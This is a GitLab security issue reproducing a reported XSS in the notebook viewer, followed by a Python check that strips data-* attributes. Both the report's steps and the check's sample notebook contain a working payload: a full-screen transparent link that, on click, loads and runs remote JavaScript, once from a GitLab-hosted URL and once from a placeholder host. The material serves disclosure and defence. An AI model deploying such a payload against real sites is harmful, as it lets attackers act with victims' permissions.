GitLab.org / GitLab / Issues / #294128 (Closed)
Issue created Dec 16, 2020 by GitLab SecurityBot (@gitlab-securitybot), Reporter

XSS on the blob viewer of notebooks

HackerOne report #1060114 by yvvdwf on 2020-12-16, assigned to @ankelly:

Report | How To Reproduce

Report

Hello,

GitLab recently started using DOMPurify to sanitize data. DOMPurify allows data-* attributes by default. When data-* attributes are allowed in the presence of rails-ujs, attackers might trick victims into executing any JavaScript.

The following attack scenario triggers an alert when you click anywhere on the blob viewer screen of notebooks. Since GitLab allows sending API requests via JavaScript in web browsers, attackers may perform arbitrary actions on behalf of victims, such as escalating permissions, accessing private objects, etc.

Steps to reproduce
  1. In a project, create a file xss.ipynb with the following content (note edited with a known safe payload):
     {
       "cells": [
         {
           "cell_type": "markdown",
           "source": [
             "<a data-type=script data-remote=true href='https://gitlab.com/ankelly/pipeline_payload/-/jobs/[REDACTED]/artifacts/raw/data/alert.js' style='position:fixed;z-index:9999;top:0;left:0;right:0;bottom:0'></a>CLICK ANYWHERE TO SHOW POPUP"
           ]
         }
       ]
     }
  2. When viewing this file, you might notice a transparent layer on top of everything else. This layer intercepts any click events. Once you click anywhere, you should see a popup.
Impact

Once victims click anywhere on the screen of the notebook viewer, attackers might execute their JavaScript. Since GitLab allows sending API requests via JavaScript in web browsers, attackers may perform arbitrary actions on behalf of victims, such as escalating permissions, accessing private objects, etc.

Examples

https://gitlab.com/yvvdwf/notebook/-/blob/master/xss.ipynb

What is the current bug behavior?

data-* attributes are not removed when sanitizing.

What is the expected correct behavior?

data-* attributes should be removed when sanitizing.

Output of checks

This bug happens on GitLab.com.

How To Reproduce

Please add reproducibility information to this section:

Edited Jul 07, 2022 by Costel Maxim
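A check for the expected behaviour stated in the report (data-* attributes removed when sanitizing), added here as an example and not GitLab's or DOMPurify's own code: it walks an .ipynb, strips every data-* attribute from the HTML of each markdown cell with Python's html.parser, and reports which rails-ujs-interpreted attributes were present. The sample notebook, the script URL and the RAILS_UJS_ATTRS set are constructed for this example.

```python
import json
from html import escape
from html.parser import HTMLParser

# rails-ujs acts on these: an <a> with data-remote="true" is fetched via XHR on
# click, and data-type="script" makes the response be evaluated as JavaScript.
RAILS_UJS_ATTRS = {"data-remote", "data-type", "data-method", "data-params", "data-confirm"}

class DataAttrStripper(HTMLParser):
    # Re-emits markup, dropping every data-* attribute and recording what was dropped.
    def __init__(self):
        super().__init__()
        self.out, self.dropped = [], []  # dropped: (tag, attribute, value)

    def _emit(self, tag, attrs, self_closing=False):
        kept = []
        for name, value in attrs:
            if name.lower().startswith("data-"):  # same rule as DOMPurify's ALLOW_DATA_ATTR: false
                self.dropped.append((tag, name.lower(), value))
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"' if value is not None else f" {name}")
        self.out.append(f"<{tag}{''.join(kept)}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs): self._emit(tag, attrs)
    def handle_startendtag(self, tag, attrs): self._emit(tag, attrs, True)
    def handle_endtag(self, tag): self.out.append(f"</{tag}>")
    def handle_data(self, data): self.out.append(escape(data, quote=False))  # re-escape text nodes

def strip_data_attributes(markup):
    """Return (cleaned_markup, list_of_dropped_attributes)."""
    p = DataAttrStripper()
    p.feed(markup)
    p.close()
    return "".join(p.out), p.dropped

def sanitize_notebook_markdown(notebook_json):
    """Strip data-* from every markdown cell; report rails-ujs attributes that were present."""
    nb = json.loads(notebook_json)
    findings = []
    for idx, cell in enumerate(nb.get("cells", [])):
        if cell.get("cell_type") != "markdown":
            continue
        src = cell["source"] if isinstance(cell["source"], str) else "".join(cell["source"])
        cleaned, dropped = strip_data_attributes(src)
        cell["source"] = cleaned
        findings += [(idx, tag, name) for tag, name, _ in dropped if name in RAILS_UJS_ATTRS]
    return nb, findings

# Constructed sample mirroring the report's cell; the script URL is a placeholder, not the real one.
SAMPLE_NOTEBOOK = json.dumps({"cells": [{"cell_type": "markdown", "source": [
    "<a data-type=script data-remote=true href='https://example.invalid/alert.js' "
    "style='position:fixed;z-index:9999;top:0;left:0;right:0;bottom:0'></a>CLICK ANYWHERE TO SHOW POPUP"]}]})
```

In the browser-side sanitizer the equivalent hardening is DOMPurify's ALLOW_DATA_ATTR: false option; a server-side or CI pass like this one is a second line of defence for notebooks whose rendered markdown bypasses the client sanitizer.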